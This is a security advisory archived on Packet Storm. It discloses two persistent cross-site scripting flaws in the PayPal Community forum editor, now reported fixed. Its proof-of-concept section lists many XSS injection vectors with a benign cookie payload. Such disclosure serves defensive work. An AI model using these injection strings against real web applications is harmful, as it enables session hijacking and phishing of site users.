exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PayPal Community Web Portal Cross Site Scripting

PayPal Community Web Portal Cross Site Scripting
Posted Sep 27, 2014
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

PayPal Community Web Portal suffered from cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss
SHA-256 | 66eac32c73b32b474e784bbd86e55d93ac7e0620b25e7cf309f01b0e26ef0773

PayPal Community Web Portal Cross Site Scripting

Change Mirror Download
Document Title:
===============
Paypal Inc Bug Bounty #32 - Multiple Persistent Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=716


Release Date:
=============
2014-09-22


Vulnerability Laboratory ID (VL-ID):
====================================
716


Common Vulnerability Scoring System:
====================================
4.1


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered 2 persistent web vulnerabilities in the official PayPal Community Forum website application.


Vulnerability Disclosure Timeline:
==================================
2014-09-22: Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Community (Forums) 2012 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official PayPal Community Portal Website Application.
The vulnerability allows an attacker to inject malicious persistent script code on application side of the vulnerable online-service module.

The web vulnerability is located in the editor exception-handling thats redisplays the message link. The Forum Editor provids an exception handling
function for the editor in the titel inputs. The message context title provids a value exception. The value exception displays the error title input
in a own exception. After the input title manipulation the execution of the code takes place in the exception handling message of the forum tinymceditor.
Low privileged remote attackers interact with the exception of the editor module to change the message link (persistent).

The security risk of the persistent vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 4.1.
The vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirect to malicious sources and
persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Section(s):
[+] PayPal Inc - Community

Vulnerable Module(s):
[+] Editor - lia-form-tiny-mce-editor-input (lia-form-field-error)
[+] Message Link under Exception

Vulnerable Parameter(s):
[+] tinyMceEditor


Proof of Concept (PoC):
=======================
The 2 persistent web vulnerabilities can be exploited by remote attackers without privileged application user accounts and with low or medium user inter action.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Payload: >"<iframe src="x-javascript:document.cookie=true;> >" <script>a="/XSS/

PoC: Output Listing Exception-handling (tinyMceEditor)

\ndocument.cookie=true;</SCRIPT>">"</TITLE><SCRIPT>document.cookie=true;</SCRIPT> >"<INPUT TYPE="IMAGE"
src="x-javascript:document.cookie=true;"> >"<BODY BACKGROUND="javascript:document.cookie=true;"> >"<BODY ONLOAD=document.cookie=true;>
>"<IMG DYNsrc="x-javascript:document.cookie=true;"> >"<IMG LOWsrc="x-javascript:document.cookie=true;"> >"<BGSOUND src="x-

javascript:document.cookie=true;"> >"<BR SIZE="&{document.cookie=true}"> >"<LAYER src="x-javascript:document.cookie=true;"></LAYER>
>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> >"<STYLE>li {list-style-image: url
("javascript:document.cookie=true;");</STYLE><UL><LI>XSS >"¼script¾document.cookie=true;¼/script¾ >"<IFRAME src="x-
javascript:document.cookie=true;"></iframe> >" >"



PoC: Editor - lia-form-field-error (tinyMceEditor)

<div class="lia-form-label-wrapper">
<label for="lia-subject" class="lia-form-label lia-form-field-error">Title</label>
</div>



PoC: Message Link under Exception

>"<img src="blah%3E" onmouseover="document.cookie=true;"> >"<xml src="x-javascript:document.cookie=true;"> >"<xml

id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> >"<div datafld="b" dataformatas="html" datasrc="#X"></div>
]]>
[\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>"
name="subject" id="lia-subject" class="lia-form-board-input
lia-form-type-text"/>
<div id="ppl-subject-search-render">
</div>
<p class="lia-form-error-text">This value must be shorter than 2,000 characters in length.</p>



Reference(s):
../POST1.txt
../POST2.txt
../securityresearch.htm


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode the exception-handling output in the mceeditor.
Parse the preview Message link in the body of the exception to disallow url spoofing and phishing.
Restrict the input field to prevent further script code injection attacks through the community editor.

The issue has been resolved by the paypal inc security and developer team.

Security Risk:
==============
The security risk of the both application-side input validation web vulnerabilities is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]


--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close